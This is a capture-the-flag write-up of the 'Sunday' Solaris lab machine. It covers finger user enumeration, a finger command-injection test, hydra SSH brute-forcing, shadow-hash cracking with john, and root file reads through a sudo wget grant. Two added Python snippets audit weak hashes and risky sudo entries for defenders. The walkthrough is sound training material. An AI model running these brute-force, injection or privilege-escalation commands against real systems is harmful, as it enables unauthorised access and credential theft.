# Enumeration Stage

### NMAP 
There is a firewall that is filtering our requests. To bypass it I ran the scan with the -sS and -A flags.
1. -sS (TCP SYN scan), as described in the Nmap reference guide:
   SYN scan is the default and most popular scan option for good reasons. It can be performed quickly, scanning thousands of ports per second on a fast network not hampered by restrictive firewalls. It is also relatively unobtrusive and stealthy since it never completes TCP connections. SYN scan works against any compliant TCP stack rather than depending on idiosyncrasies of specific platforms. This technique is often referred to as half-open scanning, because you don't open a full TCP connection. You send a SYN packet, as if you are going to open a real connection and then wait for a response. A SYN/ACK indicates the port is listening (open), while a RST (reset) is indicative of a non-listener. If no response is received after several retransmissions, the port is marked as filtered. The port is also considered open if a SYN packet (without the ACK flag) is received in response.
2. -sT (TCP connect scan): TCP connect scan is the default TCP scan type when SYN scan is not an option.

The service scan reveals five open ports.

```bash
# nmap -p- -sV -sC -T4 
79/tcp    open  finger  Sun Solaris fingerd
|_finger: No one logged on\x0D
111/tcp   open  rpcbind 2-4 (RPC #100000)
22022/tcp open  ssh     SunSSH 1.3 (protocol 2.0)
| ssh-hostkey: 
|   1024 d2:e5:cb:bd:33:c7:01:31:0b:3c:63:d9:82:d9:f1:4e (DSA)
|_  1024 e4:2c:80:62:cf:15:17:79:ff:72:9d:df:8b:a6:c9:ac (RSA)
44060/tcp open  unknown
44273/tcp open  rpcbind
Service Info: OS: Solaris; CPE: cpe:/o:sun:sunos
```

### Port 79/tcp finger
**Finger** is a program you can use to find information about computer users. It usually lists the login name, the full name, and possibly other details about the user you are fingering. These details may include the office location and phone number (if known), login time, idle time, time mail was last read, and the user's plan and project files.

[This website(hacktricks.xyz)](https://book.hacktricks.xyz/pentesting/pentesting-finger) reveals **really** cool information on the service and ways to exploit it.

```bash
# finger [email protected]
Login       Name               TTY         Idle    When    Where
xvm      xVM User                           < .  .  .  . >
openldap OpenLDAP User                      < .  .  .  . >
nobody   NFS Anonymous Access               < .  .  .  . >
noaccess No Access User                     < .  .  .  . >
nobody4  SunOS 4.x NFS Anonym               < .  .  .  . >
```

###### Metasploit finger user enumeration
We have already enumerated some users, but it doesn't hurt to try the Metasploit module too. From the output we understand that there is a mysql user too. 

```bash
msf6 auxiliary(scanner/finger/finger_users) > run

[+]        - - Found user: sunny
[+]        - - Found user: adm
[+]        - - Found user: lp
[+]        - - Found user: uucp
[+]        - - Found user: nuucp
[+]        - - Found user: dladm
[+]        - - Found user: listen
[+]        - - Found user: bin
[+]        - Users found: adm, bin, dladm, listen, lp, nuucp, sunny, uucp
[*]        - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

###### Command injection test

```bash
# finger "/bin/ls -a /@"
Login       Name               TTY         Idle    When    Where
/bin/ls               ???
-a                    ???
/                     ???

# finger "|[email protected]"
Login       Name               TTY         Idle    When    Where
|ls                   ???
```

### Port 111/tcp portmapper
In networks protected by firewalls and other mechanisms, access to the RPC portmapper service running on port 111 is often filtered. Therefore, determined attackers can scan high port ranges (UDP and TCP ports 32771 through 34000 on ***Solaris*** hosts) to identify RPC services that are open to direct attack.

You can run ***nmap*** with the ***-sR*** option to identify RPC services listening on high ports if the portmapper is inaccessible.

### Bruteforcing ssh service
Found password "sunday".

```bash
# hydra -I -l sunny -P /home/kali/passwords.txt -t 16 -s 22022 ssh://

[DATA] attacking ssh://
[22022][ssh] host:   login: sunny   password: sunday
1 of 1 target successfully completed, 1 valid password found
```

# Privilege Escalation
Logging in through ssh using sunny:sunday as username:password.

```bash
# ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 [email protected] -p 22022
Last login: Tue Apr 24 10:48:11 2018 from
Sun Microsystems Inc.   SunOS 5.11      snv_111b        November 2008
```

A weird file:

```bash
sunny@sunday:/tmp$ cat ogl_select253 
SUNWtext mesa
NVDAnvda nvidia
```

PATH poisoning attempt. Upon logging in, I tried sudo -l and I see that /root/troll does not require a password to run. Upon running it, my guess is that it invokes "id" via a system call. Therefore I am creating a copy of /bin/bash with the name "id" and exporting the path to that file so that it is executed when "id" is invoked; root would then run /bin/bash and I should privesc. Unfortunately, the attempt is unsuccessful.

```bash
sunny@sunday:/usr/share$ sudo -l
User sunny may run the following commands on this host:
    (root) NOPASSWD: /root/troll

sunny@sunday:/usr/share$ sudo /root/troll
uid=0(root) gid=0(root)

sunny@sunday:/tmp/$ cp /bin/bash /tmp/id
sunny@sunday:/tmp/$ chmod 777 id
sunny@sunday:/tmp/$ echo $PATH
sunny@sunday:/tmp/$ export PATH=/tmp:$PATH
sunny@sunday:/tmp/$ sudo /root/troll
uid=0(root) gid=0(root)
```

I have discovered a backup shadow file containing sammy's pass hash.

```bash
sunny@sunday:/backup$ cat shadow.backup
```

Using john, I managed to extract the password from the hash. username:password == sammy:cooldude!

```bash
# john crack.txt --wordlist=/usr/share/wordlists/rockyou.txt       
Using default input encoding: UTF-8
Loaded 1 password hash (sha256crypt, crypt(3) $5$ [SHA256 128/128 AVX 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:26 0.74% (ETA: 12:51:05) 0g/s 4771p/s 4771c/s 4771C/s dtown214..balls2
cooldude!        (sammy)
1g 0:00:00:43 DONE (2021-05-17 11:53) 0.02300g/s 4687p/s 4687c/s 4687C/s domonique1..chrystelle
Use the "--show" option to display all of the cracked passwords reliably
Session completed
```
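Added example, not part of the original writeup: john reports a cost of 5000 iterations for this sha256crypt hash, which is the crypt(3) default when the `$5$` field carries no `rounds=` parameter. The Python below parses shadow-style password fields and flags hashes below an assumed policy floor; the shadow lines, salts and digests are constructed placeholders, not the real values from the box.

```python
import re

# Constructed sample in /etc/shadow format. The digests are placeholders,
# not the real hash from the box. A bare "$5$" prefix with no "rounds="
# field means the sha256crypt default of 5000 iterations, which is what
# john reported above ("Cost 1 (iteration count) is 5000").
SAMPLE_SHADOW = """root:$6$rounds=100000$SALTSALT$PLACEHOLDERDIGEST:18000:0:99999:7:::
sammy:$5$saltsalt$PLACEHOLDERDIGEST:18000:0:99999:7:::
bin:NP:6445::::::
"""

ALGOS = {"1": "md5crypt", "5": "sha256crypt", "6": "sha512crypt"}
DEFAULT_ROUNDS = {"5": 5000, "6": 5000}   # crypt(3) defaults when rounds= is absent
MIN_ROUNDS = 50000                         # assumed local policy floor for sha*crypt

HASH_RE = re.compile(r"^\$(?P<id>[0-9a-z]+)\$(?:rounds=(?P<rounds>\d+)\$)?")

def parse_crypt(field: str) -> dict:
    """Return algorithm and iteration count from a crypt(3) password field.
    Fields that are not "$id$..." (locked, NP, empty) are reported as not crackable."""
    m = HASH_RE.match(field)
    if not m:
        return {"algo": None, "rounds": None, "crackable": False}
    algo_id = m.group("id")
    rounds = int(m.group("rounds")) if m.group("rounds") else DEFAULT_ROUNDS.get(algo_id)
    return {"algo": ALGOS.get(algo_id, "unknown:" + algo_id), "rounds": rounds, "crackable": True}

def weak_hashes(shadow_text: str) -> list:
    """List (user, reason) for accounts whose hash would fall quickly to a
    john-style wordlist run: md5crypt, or sha*crypt below the MIN_ROUNDS floor."""
    out = []
    for line in shadow_text.splitlines():
        if not line.strip():
            continue
        user, field = line.split(":")[:2]
        info = parse_crypt(field)
        if not info["crackable"]:
            continue
        if info["algo"] == "md5crypt":
            out.append((user, "md5crypt has no iteration count"))
        elif info["rounds"] is not None and info["rounds"] < MIN_ROUNDS:
            out.append((user, f'{info["algo"]} with only {info["rounds"]} rounds'))
    return out

if __name__ == "__main__":
    for user, reason in weak_hashes(SAMPLE_SHADOW):
        print(f"{user}: {reason}")
```

A backup of shadow lying readable outside /etc, as on this box, is the other half of the problem: the iteration count only buys time once the hash has leaked.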

Changing user to sammy. I once again tested the mandatory "sudo -l" command and received a ***NOPASSWD*** entry for ***/usr/bin/wget***. According to [GTFOBins](https://gtfobins.github.io/gtfobins/wget/) we can escalate privileges by downloading our own file and saving it over one on the victim (such as shadow), or simply use wget to read files. 

```bash
sunny@sunday:/tmp$ sudo -l
User sammy may run the following commands on this host:
    (root) NOPASSWD: /usr/bin/wget
sunny@sunday:/tmp$ LFILE=/root/root.txt
sunny@sunday:/tmp$ sudo wget -i $LFILE
/root/root.txt: Invalid URL <fb40..ROOT FLAG>: Unsupported scheme
No URLs found in /root/root.txt.
```
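Added defender-side example, not from the original writeup: a small Python audit that parses `sudo -l` output like the two shown above (sunny's /root/troll and sammy's /usr/bin/wget) and flags file-access binaries listed on GTFOBins as well as custom scripts outside system directories that need a manual review. The sample inputs and the GTFOBins subset are constructed, and the extra /usr/bin/less entry is there only to exercise the tag parsing.

```python
import re
from collections import namedtuple

# Constructed samples mirroring the two `sudo -l` outputs in the writeup, plus
# one extra password-protected entry so the tag parsing is exercised.
SAMPLE_SUNNY = """User sunny may run the following commands on this host:
    (root) NOPASSWD: /root/troll
"""
SAMPLE_SAMMY = """User sammy may run the following commands on this host:
    (root) NOPASSWD: /usr/bin/wget
    (root) /usr/bin/less
"""

# Small constructed subset of GTFOBins file-read/file-write entries; the real
# list at gtfobins.github.io is far longer.
FILE_ACCESS_BINS = {"wget", "less", "vim", "tar", "cp", "tee"}
SYSTEM_DIRS = ("/usr/bin/", "/usr/sbin/", "/bin/", "/sbin/")

USER_RE = re.compile(r"^User (\S+) may run")
ENTRY_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>/\S.*)$")
SudoEntry = namedtuple("SudoEntry", "user runas nopasswd command")

def parse_sudo_l(text: str) -> list:
    """Turn `sudo -l` output into SudoEntry records, one per command line."""
    user, entries = "?", []
    for line in text.splitlines():
        if (m := USER_RE.match(line)):
            user = m.group(1)
        elif (m := ENTRY_RE.match(line)):
            entries.append(SudoEntry(user, m.group("runas"),
                                     "NOPASSWD:" in m.group("tags"), m.group("cmd").strip()))
    return entries

def findings(text: str) -> list:
    """Flag grants that allow file read/write as the run-as user (GTFOBins) and
    custom scripts outside system directories, whose PATH use needs review."""
    out = []
    for e in parse_sudo_l(text):
        binary = e.command.split()[0]
        name = binary.rsplit("/", 1)[-1]
        if name in FILE_ACCESS_BINS:
            risk = "arbitrary file read/write as %s (GTFOBins)" % e.runas
        elif not binary.startswith(SYSTEM_DIRS):
            risk = "custom script run as %s; review its PATH and argument handling" % e.runas
        else:
            continue
        out.append(f"{e.user}: {'NOPASSWD ' if e.nopasswd else ''}{binary}: {risk}")
    return out
```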


